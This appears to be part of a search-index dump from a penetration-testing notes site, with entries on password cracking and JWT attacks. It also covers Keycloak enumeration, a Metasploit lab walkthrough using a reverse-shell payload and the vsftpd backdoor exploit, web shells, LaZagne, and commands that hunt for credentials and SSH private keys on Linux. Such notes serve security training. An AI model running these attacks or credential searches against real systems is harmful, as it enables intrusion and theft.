                        ","tags":["pentesting","brute force","dictionary attack","enumeration"]},{"location":"john-the-ripper/#cracking-password-of-microsoft-word-file","title":"Cracking Password of Microsoft Word file","text":"
                        cd /root/Desktop/\n/usr/share/john/office2john.py MS_Word_Document.docx > hash\ncat hash\njohn --wordlist=/root/Desktop/wordlists/1000000-password-seclists.txt hash\n
                        ","tags":["pentesting","brute force","dictionary attack","enumeration"]},{"location":"john-the-ripper/#cracking-password-of-a-zip-file","title":"Cracking password of a zip file","text":"
                        zip2john nameoffile.zip > zip.hashes\ncat zip.hashes\njohn zip.hashes\n
                        ","tags":["pentesting","brute force","dictionary attack","enumeration"]},{"location":"jwt-tool/","title":"JWT tool","text":""},{"location":"jwt-tool/#jwt-attacks","title":"JWT attacks","text":"

                        Two tools: jwt.io and jwt_tools.

                        To see a jwt decoded on your CLI:

                        jwt_tool eyJhbGciOiJIUzUxMiJ9.eyJzdWIiOiJoYXBpaGFja2VyQGhhcGloYWNoZXIuY29tIiwiaWF0IjoxNjY5NDYxODk5LCJleHAiOjE2Njk\n1NDgyOTl9.yeyJzdWIiOiJoYXBpaGFja2VyQGhhcGloYWNoZXIuY29tIiwiaWF0IjoxNjY5NDYxODk5LCJleHAiOjE2Njk121Lj2Doa7rA9oUQk1Px7b2hUCMQJeyCsGYLbJ8hZMWc7304aX_hfkLB__1o2YfU49VajMBhhRVP_OYNafttug \n

                        Result:

                        Also, to see the decoded jwt, knowing that is encoded in base64, we could echo each of its parts:

                        echo eyJhbGciOiJIUzUxMiJ9 | base64 -d  && echo eyJzdWIiOiJoYXBpaGFja2VyQGhhcGloYWNoZXIuY29tIiwiaWF0\nIjoxNjY5NDYxODk5LCJleHAiOjE2Njk1NDgyOTl9 | base64 -d\n

                        Results:

                        {\"alg\":\"HS512\"}{\"sub\":\"hapihacker@hapihacher.com\",\"iat\":1669461899,\"exp\":1669548299} \n

                        To run a JWT scan with jwt_tool, run:

                        jwt_tool -t <http://target-site.com/> -rh \"<Header>: <JWT_Token>\" -M pb\n# in the target site specify a path that leverages a call to a token\n# replace Header with the name of the Header and JWT_Tocker with the actual token.\n# -M: Scanning mode. 'pb' is playbook audit. 'er': fuzz existing claims to force errors. 'cc': fuzz common claims. 'at': All tests.\n

                        Example:

                        Some more jwt_tool flags that may come in hand:

                        # -X EXPLOIT, --exploit EXPLOIT\n#                        eXploit known vulnerabilities:\n#                        a = alg:none\n#                        n = null signature\n#                        b = blank password accepted in signature\n#                        s = spoof JWKS (specify JWKS URL with -ju, or set in jwtconf.ini to automate this attack)\n#                        k = key confusion (specify public key with -pk)\n#                        i = inject inline JWKS\n
                        "},{"location":"jwt-tool/#the-none-attack","title":"The none attack","text":"

                        A JWT with \"none\" as its algorithm is a free ticket. Modify user and become admin, root,... Also, in poorly implemented JWT, sometimes user and password can be found in the payload.

                        To craft a jwt with \"none\" as the value for \"alg\", run:

                        jwt_tool <JWT_Token> -X a\n
                        "},{"location":"jwt-tool/#the-null-signature-attack","title":"The null signature attack","text":"

                        Second attack in this section is removing the signature from the token. This can be done by erasing the signature altogether and leaving the last period in place.

                        "},{"location":"jwt-tool/#the-blank-password-accepted-in-signature","title":"The blank password accepted in signature","text":"

                        Launching this attack is relatively simple. Just remove the password value from the payload and leave it in blank. Then, regenerate the jwt.

                        Also, with jwt_tool, run:

                        jwt_tool <JWT_Token> -X b\n
                        "},{"location":"jwt-tool/#the-algorithm-switch-or-key-confusion-attack","title":"The algorithm switch (or key-confusion) attack","text":"

                        A more likely scenario than the provider accepting no algorithm is that they accept multiple algorithms. For example, if the provider uses RS256 but doesn\u2019t limit the acceptable algorithm values, we could alter the algorithm to HS256. This is useful, as RS256 is an asymmetric encryption scheme, meaning we need both the provider\u2019s private key and a public key in order to accurately hash the JWT signature. Meanwhile, HS256 is symmetric encryption, so only one key is used for both the signature and verification of the token. If you can discover the provider\u2019s RS256 public key and then switch the algorithm from RS256 to HS256, there is a chance you may be able to leverage the RS256 public key as the HS256 key.

                        jwt_tool <JWT_Token> -X k -pk public-key.pem\n# You will need to save the captured public key as a file on your attacking machine.\n
                        "},{"location":"jwt-tool/#the-jwt-crack-attack","title":"The jwt crack attack","text":"

                        JWT_Tool can still test 12 million passwords in under a minute. To perform a JWT Crack attack using JWT_Tool, use the following command:

                        jwt_tool <JWT Token> -C -d /wordlist.txt\n# -C indicates that you are conducting a hash crack attack\n# -d specifies the dictionary or wordlist\n

                        You can generate this wordlist for the secret signature of the json web token by using crunch.

                        Once you crack the secret of the signature, we can create our own trusted tokens. 1. Grab another user email (in the crapi app, from the data exposure vulnerability when getting the forum (GET {{baseUrl}}/community/api/v2/community/posts/recent). 2. Generate a token with the secret.

                        "},{"location":"jwt-tool/#spoofing-jwks","title":"Spoofing JWKS","text":"

                        Specify JWS URL with -ju, or set in jwtconf.ini to automate this attack.

                        "},{"location":"jwt-tool/#inject-inline-jwks","title":"Inject inline JWKS","text":""},{"location":"kernel-vulnerability-exploitation/","title":"Kernel vulnerability exploitation","text":"System vulnerability Exploit Ubuntu 16.04 LTS Exploit 39772 Ubuntu 18.04 LTS + lxd lxd privilege escalation","tags":["pentesting","privilege escalation","linux"]},{"location":"keycloak-pentesting/","title":"Pentesting Keycloak","text":"

                        Keycloak is an open-source Identity and Access Management (IAM) solution. It allows easy implementation of single sign-on for web applications and APIs.

                        Sources
                        • https://www.surecloud.com/resources/blog/pentesting-keycloak-part-1
                        ","tags":["wordpress","keycloak"]},{"location":"keycloak-pentesting/#fingerprint-and-enumeration","title":"Fingerprint and enumeration","text":"","tags":["wordpress","keycloak"]},{"location":"keycloak-pentesting/#keycloak-running","title":"Keycloak running...","text":"

                        For assessing an environment running Keycloak, we will need first to fingerprint it, meaning to identify that we are facing a keycloak implementation and to determine which version is. For that:

                        1. Cookie Name \u2013 Once logged in with valid credentials, pay attention to cookies.
                        2. URLs: Keycloak has a very distinctive URL.
                        3. JWT Payload: Even if this is an OAuth requirement, the JWT could also give you a hint that you\u2019re using Keycloak, just by looking at sections like \u2018resource_access\u2019 and \u2018scope\u2019.
                        4. Page Source: Finally, you might also find references of /keycloak/ in the source code of the login page.
                        ","tags":["wordpress","keycloak"]},{"location":"keycloak-pentesting/#version","title":"Version","text":"

                        At the moment, there is no way to identify the running Keycloak version by looking at it from an unauthenticated perspective. The only way is via an administrative account (with the correct JWT token in the request header): GET /auth/admin/serverinfo.

                        The latest stable version of Keycloak is available at https://www.keycloak.org/downloads \u2013 Make sure the client is running the latest. If not, check if there are public CVEs and/or exploits on:

                        https://repology.org/project/keycloak/cves https://www.cvedetails.com/version-list/16498/37999/1/Keycloak-Keycloak.html https://www.exploit-db.com/

                        ","tags":["wordpress","keycloak"]},{"location":"keycloak-pentesting/#enumeration","title":"Enumeration","text":"","tags":["wordpress","keycloak"]},{"location":"keycloak-pentesting/#openid-configuration-saml-descriptor","title":"OpenID Configuration / SAML Descriptor","text":"
                        /auth/realms/<realm_name>/.well-known/openid-configuration /auth/realms/<realm_name>/protocol/saml/descriptor\n

                        For public keys:

                        /auth/realms/<realm_name>/\n
                        ","tags":["wordpress","keycloak"]},{"location":"keycloak-pentesting/#realms","title":"Realms","text":"

                        A realm manages a set of users, credentials, roles, and groups. A user belongs to and logs into a realm. Realms are isolated from one another and can only manage and authenticate the users that they control.

                        When you boot Keycloak for the first time, Keycloak creates a pre-defined realm for you. This initial realm is the master realm \u2013 the highest level in the hierarchy of realms. Admin accounts in this realm have permissions to view and manage any other realm created on the server instance. When you define your initial admin account, you create an account in the master realm. Your initial login to the admin console will also be via the master realm.

                        It is not recommended to configure a web application\u2019s SSO on the default master realm for security and granularity. Realms can be easily enumerated, but that\u2019s a default behaviour of the platform. Obtaining a list of valid realms might be useful later on in the assessment.

                        It is possible to enumerate via Burp Suite Intruder on the following URL:

                        /auth/realms/<realm_name>/\n

                        A possible dictionary: https://raw.githubusercontent.com/chrislockard/api_wordlist/master/objects.txt.

                        Realms can be configured to allow user self-registration. This is not an issue itself and is often advertised in the login page:

                        If the application is using a custom template for the login page, hiding the registration link, we can still try to directly access the registration link, which is:

                        /auth/realms//login-actions/registration?client_id=&tab_id=

                        Of course, disabling self-registration in a production environment is recommended.

                        ","tags":["wordpress","keycloak"]},{"location":"keycloak-pentesting/#clients-id","title":"Clients ID+","text":"

                        Clients are entities that can request Keycloak to authenticate a user. Most often, clients are applications and services that want to use Keycloak to secure themselves and provide a single sign-on solution. Clients can also be entities that just want to request identity information or an access token so that they can securely invoke other services on the network that Keycloak secures.

                        Each realm (identified below) might have a different set of client ids.

                        When landing on a login page of a realm, the URL will be auto-filled with the default \u2018client_id\u2019 and \u2018scope\u2019 parameters, e.g.:

                        /auth/realms/<realm_name>/protocol/openid-connect/auth?**client_id=account-console**&redirect_uri=<...>&state=<...>&response_mode=<...>&response_type=<...>&**scope=openid**&nonce=<...>&code_challenge=<...>&code_challenge_method=<...>\n

                        We can use here some dictionaries.

                        Additionally, the following default client ids should also be available upon Keycloak installation:

                        account\naccount-console\naccounts\naccounts-console\nadmin\nadmin-cli\nbroker\nbrokers\nrealm-management\nrealms-management\nsecurity-admin-console\n

                        No HTTP response code could help us to identify a valid client_id from a wrong one. We should focus on whether the length of the response differs from the majority of the responses.

                        This process should be repeated for each valid realm identified in previous steps.

                        Clients can be configured with different Access Types:

                        • Bearer-Only\u00a0\u2013 Used for backend servers and API (requests that already contain a token/secret in the request header)
                        • Public\u00a0\u2013 Able to initiate login flaw (Auth flow to get an access token) and does not hold or send any secrets
                        • Confidential\u00a0\u2013 Used for backend servers and able to initiate login flaw. Can accept or send secrets.

                        Therefore, when we encounter a \u201cclient_secret\u201d parameter in the login request, we\u2019re probably looking at a client with a Confidential or Bearer-Only Access Type.

                        ","tags":["wordpress","keycloak"]},{"location":"keycloak-pentesting/#scopes","title":"Scopes","text":"

                        When a client is registered, you must define protocol mappers and role scope mappings for that client. It is often useful to store a client scope to make creating new clients easier by sharing some common settings. This is also useful for requesting some claims or roles to be conditionally based on the value of the scope parameter. Keycloak provides the concept of a client scope for this.

                        When landing on a login page of a realm, the URL will be auto-filled with the default \u2018client_id\u2019 and \u2018scope\u2019 parameters, e.g.:

                        /auth/realms/<realm_name>/protocol/openid-connect/auth?**client_id=account-console**&redirect_uri=<...>&state=<...>&response_mode=<...>&response_type=<...>&**scope=openid**&nonce=<...>&code_challenge=<...>&code_challenge_method=<...>\n

                        It is possible to identify additional scopes via Burp Suite Intruder, by keeping all the other parameters with the same value:

                        The following, additional, default scopes should also be available upon KeyCloak installation:

                        address  \naddresses  \nemail  \nemails  \nmicroprofile-jwt  \noffline_access  \nphone  \nopenid  \nprofile  \nrole_list  \nroles  \nrole  \nweb-origin  \nweb-origins\n

                        It is quite straight forward to identify valid scopes from non-valid scopes by looking at the content length or status code.

                        This process should be repeated for each realm identified in previous steps.

                        It should be noted that valid scopes can be concatenated within the URL prior of the login, e.g.:

                        ...&scope=openid+offline_access+roles+email+phone+profile+address+web-origins&...

                        This will \u2018force\u2019 Keycloak to grant any available/additional scope, for such realm \u2013 but also depending on the user\u2019s role configuration.

                        ","tags":["wordpress","keycloak"]},{"location":"keycloak-pentesting/#grants","title":"Grants","text":"

                        OAuth 2 provides several \u2018grant types\u2019 for different use cases. The grant types defined are:

                        • Authorization Code for apps running on a web server, browser-based and mobile apps
                        • Password for logging in with a username and password (only for first-party apps)
                        • Client credentials for application access without a user present
                        • Implicit was previously recommended for clients without a secret, but has been superseded by using the Authorization Code grant with PKCE

                        A good resource to understand use cases of grants is available from\u00a0Aaron Parecki.\u00a0

                        Grants cannot be enumerated and are as follow:

                        authorization_code password client_credentials refresh_token implicit urn:ietf:params:oauth:grant-type:device_code urn:openid:params:grant-type:ciba

                        ","tags":["wordpress","keycloak"]},{"location":"keycloak-pentesting/#identity-provider","title":"Identity Provider","text":"

                        Keycloak can be configured to delegate authentication to one or more Identity Providers (IDPs). Social login via Facebook or Google+ is an example of an identity provider federation. You can also hook Keycloak to delegate authentication to any other OpenID Connect or SAML 2.0 IDP.

                        ","tags":["wordpress","keycloak"]},{"location":"keycloak-pentesting/#identity-provider-enumeration","title":"Identity Provider Enumeration","text":"

                        There are a number of external identity providers that can be configured within Keycloak. The URL to use within Intruder is:

                        /auth/realms//broker//endpoint

                        The full list of default IDP names is as follow:

                        gitlab github facebook google linkedin instagram microsoft bitbucket twitter openshift-v4 openshift-v3 paypal stackoverflow saml oidc keycloak-oidc

                        Once again, the status codes might differ, but the length will disclose which IDP is enabled. It should be noted that, by default, the login page will disclose which IDPs are enabled:

                        ","tags":["wordpress","keycloak"]},{"location":"keycloak-pentesting/#roles","title":"Roles","text":"

                        Roles identify a type or category of user. Admin, user, manager, and employee are all typical roles that may exist in an organization. Applications often assign access and permissions to specific roles rather than individual users as dealing with users can be too fine-grained and hard to manage.

                        Roles cannot be easily enumerated from an unauthenticated perspective. They are usually visible within the JWT token of the user upon successful login:

                        The above image shows that \u2018account\u2019 client_id has, by default, 2 roles.

                        Realm Default Roles:

                        default-roles- offline_access uma_authorization

                        Client ID Default Roles:

                        manage-account manage-account-links delete-account manage-content view-applications view-consent view-profile read-token create-client impersonation manage-authorization manage-clients manage-events

                        ","tags":["wordpress","keycloak"]},{"location":"keycloak-pentesting/#user-email-enumeration-auth","title":"User Email Enumeration (auth)","text":"

                        It is possible to enumerate valid email addresses from an authenticated perspective via Keycloak\u2019s account page (if enabled for the logged-in user), available at:

                        /auth/realms//account/#/personal-info

                        When changing the email address to an already existing value, the system will return 409 Conflict. If the email is not in use, the system will return \u2018204 \u2013 No Content\u2019. Please note that, if Email Verification is enabled, this will send out a confirmation email to all email addresses we\u2019re going to test.

                        This process can be easily automated via Intruder and no CSRF token is needed to perform this action:

                        If the template of the account console was changed to not show the personal information page, you might want to try firing up the request via:

                        POST /auth/realms//account/ HTTP/1.1 Host: Content-Type: application/json Authorization: Bearer Origin: Content-Length: 635 Connection: close Cookie:

                        { \"id\": \"\", \"username\": \"myuser\", \"firstName\": \"my\", \"lastName\": \"user\", \"email\": \"\", \"emailVerified\": false, \"userProfileMetadata\": { \"attributes\": [ { \"name\": \"username\", \"displayName\": \"${username}\", \"required\": true, \"readOnly\": true, \"validators\": {} }, { \"name\": \"email\", \"displayName\": \"${email}\", \"required\": true, \"readOnly\": false, \"validators\": { \"email\": { \"ignore.empty.value\": true } } }, { \"name\": \"firstName\", \"displayName\": \"${firstName}\", \"required\": true, \"readOnly\": false, \"validators\": {} }, { \"name\": \"lastName\", \"displayName\": \"${lastName}\", \"required\": true, \"readOnly\": false, \"validators\": {} } ] }, \"attributes\": { \"locale\": [ \"en\" ] } }

                        The valid email addresses identified in this process can be used to perform brute force (explained in the exploitation part of the Pentesting Keyclock Part Two). For this reason, access to the Keycloak\u2019s account page should be disabled.

                        ","tags":["wordpress","keycloak"]},{"location":"kiterunner/","title":"Kiterunner","text":"

                        Kiterunner is an excellent tool that was developed and released by Assetnote. Kiterunner is currently the best tool available for discovering API endpoints and resources. While directory brute force tools like Gobuster/Dirbuster/ work to discover URL paths, it typically relies on standard HTTP GET requests. Kiterunner will not only use all HTTP request methods common with APIs (GET, POST, PUT, and DELETE) but also mimic common API path structures. In other words, instead of requesting GET /api/v1/user/create, Kiterunner will try POST /api/v1/user/create, mimicking a more realistic request.

                        1. First, download the dictionaries from the project. In my case I downloaded it to /usr/share/wordlists/kiterunner/:

                        2. https://wordlists-cdn.assetnote.io/rawdata/kiterunner/routes-large.json.tar.gz

                        3. https://wordlists-cdn.assetnote.io/rawdata/kiterunner/routes-small.json.tar.gz
                        4. https://wordlists-cdn.assetnote.io/data/kiterunner/routes-large.kite.tar.gz
                        5. https://wordlists-cdn.assetnote.io/data/kiterunner/routes-small.kite.tar.gz

                        6. Run a quick scan of your target\u2019s URL or IP address like this:

                        kr scan HTTP://127.0.0.1 -w ~/api/wordlists/data/kiterunner/routes-large.kite  \n

                        But. Note that we conducted this scan without any authorization headers, which the target API likely requires.

                        To use a dictionary (and not a kite file):

                        kr brute <target> -w ~/api/wordlists/data/automated/nameofwordlist.txt\n

                        If you have many targets, you can save a list of line-separated targets as a text file and use that file as the target.

                        One of the coolest Kiterunner features is the ability to replay requests. Thus, not only will you have an interesting result to investigate, you will also be able to dissect exactly why that request is interesting. In order to replay a request, copy the entire line of content into Kiterunner, paste it using the kb replay option, and include the wordlist you used:

                        kr kb replay \"GET     414 [    183,    7,   8]://192.168.50.35:8888/api/privatisations/count 0cf6841b1e7ac8badc6e237ab300a90ca873d571\" -w ~/api/wordlists/data/kiterunner/routes-large.kite\n

                        Running this will replay the request and provide you with the HTTP response.

                        To run Kiterunner providing an authorization token as it could be \"x-access-token\", we can take the full authorization token and add it to your Kiterunner scan with the -H option:

                        kr scan http://IP -w /path/to/dict.txt -H 'x-access-token: eyJhGcwisdfdsfdfsdfsdfsdfdsfdsfddfdf.eyfakefakefakefaketokenfakeken._wcoooooo_kkkkkk_kkkk'\n
                        "},{"location":"knockpy/","title":"knockpy - A subdomain scanner","text":"","tags":["pentesting","web pentesting","enumeration"]},{"location":"knockpy/#installation","title":"Installation","text":"

                        Repository: https://github.com/guelfoweb/knock

                        git clone https://github.com/guelfoweb/knock.git\ncd knock\npip3 install -r requirements.txt\n\n# Optional: Make an alias for knockpy\nsudo chmod +x knockpy.py \nsudo ln -s /home/kali/tools/knock/knockpy.py /usr/bin/knockpy\n
                        ","tags":["pentesting","web pentesting","enumeration"]},{"location":"knockpy/#usage","title":"Usage","text":"
                        # From the tools/knock folder\npython3 knockpy.py <DOMAIN>\n\n# If you have made an alias, just run:\nknockpy <domain>\n
                        ","tags":["pentesting","web pentesting","enumeration"]},{"location":"lateral-movements/","title":"Lateral movements","text":"","tags":["pentesting"]},{"location":"lateral-movements/#using-metasploit","title":"using metasploit","text":"
                        1. Get our ip
                        ip a\u00a0\n# 192.64.166.2\n
                        1. Get machine ip\u00a0
                        ping demo.ine.local\n# 192.64.166.3\n
                        1. Enumerate services in the target machine
                        nmap -sV -sS -O 192.64.166.3\n# open ports: 80 and 3306.\n
                        1. Go further on port 80
                        nmap\u00a0\n# In the scan you will see: V-CMS-Powered by V-CMS\u00a0 and PHPSESSID: httponly flag not set\n
                        1. Launch metasploit and search for v-cms
                        service postgresql start\nmsfconsole -q\n
                        search v-cms\n
                        1. Use the exploit exploit/linux/http/vcms_upload, configure it and run it
                        use exploit/linux/http/vcms_upload\nshow options\n
                        set RHOST 192.64.166.3\nset TARGETURI /\nset LHOST 192.64.166.2\nset payload php/meterpreter/reverse_tcp\nrun\n
                        1. You will get a limited meterpreter. Access to the shell and print the flag
                        meterpreter> shell\n> cat /root/flag.txt\n# 4f96a3e848d233d5af337c440e50fe3d\n
                        1. Map other possible interfaces in the machine. Since ifconfig does not work, spawn the shell and try again
                        ifconfig\u00a0\n# does not work\n
                        ipconfig\n# does not work\n
                        which python\n# it\u2019s located under /bin, so we can use python to spawn the shell\n
                        python -c 'import pty; pty.spawn(\"/bin/bash\")'\n
                        $root@machine> ifconfig\n# it tells us about another interface: 192.182.147.2\n
                        ","tags":["pentesting"]},{"location":"lateral-movements/#route","title":"route","text":"
                        1. Add tunnel from interface 192.64.166.3 (which is session 1 of meterpreter) and the discovered interface, 192.182.147.2 with the utility route:
                        $root@machine> exit\n
                        meterpreter> run autoroute -s 192.182.147.0 -n 255.255.255.0\n# you can also add a route out of the meterpreter. In that case you need to specify the meterpreter session: route add 192.182.147.0 .0 255.255.255.0 1\n
                        1. Background the meterpreter session and check if the route is added successfully to the metasploit's routing table.
                        meterpreter> background\nmsf> route print\n
                        1. Run auxiliary TCP port scanning module to discover any available hosts (From IP .3 to .10). And, if any of ports 80, 8080, 445, 21 and 22 are open on those hosts.
                        msf> use auxiliary/scanner/portscan/tcp\n\nmsf\u00a0 auxiliary/scanner/portscan/tcp > set PORTS 80, 8080, 445, 21, 22\n\nmsf\u00a0 auxiliary/scanner/portscan/tcp > set RHOSTS 192.69.228.3-10\n\nmsf\u00a0 auxiliary/scanner/portscan/tcp > exploit\n# Give us ports 21 and 22 open at 192.182.147.3\n
                        ","tags":["pentesting"]},{"location":"lateral-movements/#portfwd","title":"portfwd","text":"
                        1. In order to reach the discovered target, we need to fordward remote machine port to the local machine port. We want to target port 21 of that machine so we will forward remote port 21 to the local port 1234. This is done with the utility portfwd from meterpreter
                        msf\u00a0 auxiliary/scanner/portscan/tcp > sessions -i 1\n\nmeterpreter> portfwd\n# Tell you  there is none configured\n\nmeterpreter> portfwd add -l 1234 -p 21 -r 192.182.147.3\n# -l: local port \n# -p 21 The port we are targeting in our attack \n# -r the remote host\n\nmeterpreter> portfwd list\n# It tells the active Port Forwards. Now, scan the local port using Nmap\n
                        1. Run nmap on the forwarded local port to identify the service name
                        meterpreter> background\n\nmsf> nmap -sS -sV -p 1234 localhost\n# It tells you the ftp version: vsftpd 2.0.8 or later\n
                        1. Search for vsftpd exploit module and exploit the target host using vsftpd backdoor exploit module.
                        msf > search vsftpd\u00a0\nmsf> use exploit/unix/ftp/vsftpd_234_backdoor\nmsf exploit/unix/ftp/vsftpd_234_backdoor> \u00a0 set RHOSTS 192.69.228.3\nmsf exploit/unix/ftp/vsftpd_234_backdoor> exploit\n\n# Sometimes, the exploit fails the first time. If that happens then please run the exploit again.\n\n$> id\n# you are root.\n
                        1. Print the flag
                        $> cat /root/flag.txt\n# 58c7c29a8ab5e7c4c06256b954947f9a\n
                        ","tags":["pentesting"]},{"location":"laudanum/","title":"Laudanum: Injectable Web Exploit Code","text":"

                        Laudanum is a repository of ready-made files that can be used to inject onto a victim and receive back access via a reverse shell, run commands on the victim host right from the browser, and more. The repo includes injectable files for many different web application languages to include asp, aspx, jsp, php, and more.

                        ","tags":["pentesting","web pentesting","web shells"]},{"location":"laudanum/#installation","title":"Installation","text":"

                        Pre-built in Kali.

                        Download from github repo: https://github.com/jbarcia/Web-Shells/tree/master/laudanum.

                        ","tags":["pentesting","web pentesting","web shells"]},{"location":"laudanum/#basic-usage","title":"Basic usage","text":"

                        The Laudanum files can be found in the /usr/share/webshells/laudanum directory. For most of the files within Laudanum, you can copy them as-is and place them where you need them on the victim to run. For specific files such as the shells, you must edit the file first to insert your attacking host IP address

                        locate laudanum\n
                        ","tags":["pentesting","web pentesting","web shells"]},{"location":"lazagne/","title":"Lazagne","text":"

                        The\u00a0LaZagne project\u00a0is an open source application used to\u00a0retrieve lots of passwords\u00a0stored on a local computer. Each software stores its passwords using different techniques (plaintext, APIs, custom algorithms, databases, etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.

                        ","tags":["pentesting","web pentesting","passwords"]},{"location":"lazagne/#installation","title":"Installation","text":"

                        Download from github repo: https://github.com/AlessandroZ/LaZagne.

                        Download a standalone copy from https://github.com/AlessandroZ/LaZagne/releases/.

                        ","tags":["pentesting","web pentesting","passwords"]},{"location":"lazagne/#basic-usage","title":"Basic usage","text":"

                        Once Lazagne.exe is on the target, we can open command prompt or PowerShell, navigate to the directory the file was uploaded to, and execute the following command:

                        C:\\Users\\username\\Desktop> start lazagne.exe all\n# -vv: to study what it is doing in the background.\n
                        ","tags":["pentesting","web pentesting","passwords"]},{"location":"linenum/","title":"LinEnum - A tool to scan Linux system","text":"","tags":["pentesting","linux pentesting","enumeration"]},{"location":"linenum/#installation","title":"Installation","text":"

                        Clone github repo: https://github.com/rebootuser/LinEnum

                        ","tags":["pentesting","linux pentesting","enumeration"]},{"location":"linenum/#basic-usage","title":"Basic usage","text":"
                        ./LinEnum.sh -s-r report -e /tmp/ -t\n# -k: Enter keyword\n# -e: Enter export location\n# -t: Include thorough (lengthy) tests\n# -s: Supply current user password to check sudo perms (INSECURE)\n# -r Enter report name\n
                        ","tags":["pentesting","linux pentesting","enumeration"]},{"location":"linpeas/","title":"linPEAS","text":"

                        LinPEAS is a script that search for possible paths to escalate privileges on Linux/Unix*/MacOS hosts. The checks are explained on book.hacktricks.xyz

                        ","tags":["pentesting","linux pentesting","privilege escalation"]},{"location":"linpeas/#installation","title":"Installation","text":"

                        Github repo: https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS.

                        Some interesting features is that you can execute from memory and send output back to the host.

                        ","tags":["pentesting","linux pentesting","privilege escalation"]},{"location":"linux-exploit-suggester/","title":"Linux Exploit Suggester","text":"

                        Linux Exploit Suggester does pretty much what its name says: it helps in detecting security deficencies for given Linux kernel/Linux-based machine.

                        ","tags":["pentesting","privilege escalation"]},{"location":"linux-exploit-suggester/#installation","title":"Installation","text":"

                        Download from https://github.com/The-Z-Labs/linux-exploit-suggester.

                        You can also download it from and to the victim's machine with a different name, let's say \"les.sh\":

                        wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh\n
                        ","tags":["pentesting","privilege escalation"]},{"location":"linux-exploit-suggester/#basic-commands","title":"Basic commands","text":"

                        Execute it making sure of having execution permissions first:

                        ./linux-exploit-suggester.sh\n

                        Also, a nice way to serve this payload is copying the file into the folder /var/www/html of the attacker machine and then run:

                        service apache2 start\n
                        ","tags":["pentesting","privilege escalation"]},{"location":"linux-privilege-checker/","title":"Linux Privilege Checker","text":"

                        Linux privilege checker is an enumeration tool with privilege escalation checking capabilities.

                        ","tags":["pentesting","linux pentesting","privilege escalation"]},{"location":"linux-privilege-checker/#installation","title":"Installation","text":"

                        Download from: http://www.securitysift.com/download/linuxprivchecker.py

                        ","tags":["pentesting","linux pentesting","privilege escalation"]},{"location":"linux-privilege-checker/#basic-commands","title":"Basic commands","text":"

                        You can run it on your system by typing:

                         ./linuxprivchecker.py \n

                        or

                        python linuxprivchecker.py\n

                        Also, a nice way to serve this payload is copying this python file into /var/www/html and then run:

                        service apache2 start\n
                        ","tags":["pentesting","linux pentesting","privilege escalation"]},{"location":"linux/","title":"Linux","text":"","tags":["linux"]},{"location":"linux/#find-sensitive-files","title":"Find sensitive files","text":"","tags":["linux"]},{"location":"linux/#configuration-files","title":"Configuration files","text":"
                        # Return files with extension .conf, .config and .cnf, which in linux are configuration files.\nfor l in $(echo \".conf .config .cnf\");do echo -e \"\\nFile extension: \" $l; find / -name *$l 2>/dev/null | grep -v \"lib\\|fonts\\|share\\|core\" ;done\n\n\n# Search for three words (user, password, pass) in each file with the file extension .cnf.\nfor i in $(find / -name *.cnf 2>/dev/null | grep -v \"doc\\|lib\");do echo -e \"\\nFile: \" $i; grep \"user\\|password\\|pass\" $i 2>/dev/null | grep -v \"\\#\";done\n
                        ","tags":["linux"]},{"location":"linux/#databases","title":"Databases","text":"
                        # Search for databases\nfor l in $(echo \".sql .db .*db .db*\");do echo -e \"\\nDB File extension: \" $l; find / -name *$l 2>/dev/null | grep -v \"doc\\|lib\\|headers\\|share\\|man\";done\n
                        ","tags":["linux"]},{"location":"linux/#scripts","title":"Scripts","text":"
                        for l in $(echo \".py .pyc .pl .go .jar .c .sh\");do echo -e \"\\nFile extension: \" $l; find / -name *$l 2>/dev/null | grep -v \"doc\\|lib\\|headers\\|share\";done\n
                        ","tags":["linux"]},{"location":"linux/#files-including-the-txt-file-extension-and-files-that-have-no-file-extension-at-all","title":"Files including the .txt file extension and files that have no file extension at all","text":"

                        Admin may change the name of configuration files. But you can try to find them:

                        find /home/* -type f -name \"*.txt\" -o ! -name \"*.*\"\n
                        ","tags":["linux"]},{"location":"linux/#cronjobs","title":"cronjobs","text":"

                        These are divided into the system-wide area (/etc/crontab) and user-dependent executions. Some applications and scripts require credentials to run and are therefore incorrectly entered in the cronjobs. Furthermore, there are the areas that are divided into different time ranges (/etc/cron.daily, /etc/cron.hourly, /etc/cron.monthly, /etc/cron.weekly). The scripts and files used by cron can also be found in /etc/cron.d/ for Debian-based distributions.

                        ","tags":["linux"]},{"location":"linux/#ssh-keys","title":"SSH Keys","text":"
                        grep -rnw \"PRIVATE KEY\" /home/* 2>/dev/null | grep \":1\"\n\ngrep -rnw \"ssh-rsa\" /home/* 2>/dev/null | grep \":1\"\n
                        ","tags":["linux"]},{"location":"linux/#bash-history","title":"Bash History","text":"
                        tail -n5 /home/*/.bash*\n
                        ","tags":["linux"]},{"location":"linux/#logs","title":"Logs","text":"Log File Description /var/log/messages Generic system activity logs. /var/log/syslog Generic system activity logs. /var/log/auth.log (Debian) All authentication related logs. /var/log/secure (RedHat/CentOS) All authentication related logs. /var/log/boot.log Booting information. /var/log/dmesg Hardware and drivers related information and logs. /var/log/kern.log Kernel related warnings, errors and logs. /var/log/faillog Failed login attempts. /var/log/cron Information related to cron jobs. /var/log/mail.log All mail server related logs. /var/log/httpd All Apache related logs. /var/log/mysqld.log All MySQL server related logs.
                         for i in $(ls /var/log/* 2>/dev/null);do GREP=$(grep \"accepted\\|session opened\\|session closed\\|failure\\|failed\\|ssh\\|password changed\\|new user\\|delete user\\|sudo\\|COMMAND\\=\\|logs\" $i 2>/dev/null); if [[ $GREP ]];then echo -e \"\\n#### Log file: \" $i; grep \"accepted\\|session opened\\|session closed\\|failure\\|failed\\|ssh\\|password changed\\|new user\\|delete user\\|sudo\\|COMMAND\\=\\|logs\" $i 2>/dev/null;fi;done\n
                        ","tags":["linux"]},{"location":"linux/#credentials-storage","title":"Credentials storage","text":"","tags":["linux"]},{"location":"linux/#shadow-file","title":"Shadow file","text":"

                        The /etc/shadow file has a unique format in which the entries are entered and saved when new users are created.

                        htb-student:    $y$j9T$3QSBB6CbHEu...SNIP...f8Ms:   18955:  0:  99999:  7:  :   :   :\n<username>:     <encrypted password>:   <day of last change>:   <min age>:  <max age>:  <warning period>:   <inactivity period>:    <expiration date>:  <reserved field>\n

                        The encryption of the password in this file is formatted as follows:

                        $ <id> $ <salt> $ <hashed> $ y $ j9T $ 3QSBB6CbHEu...SNIP...f8Ms

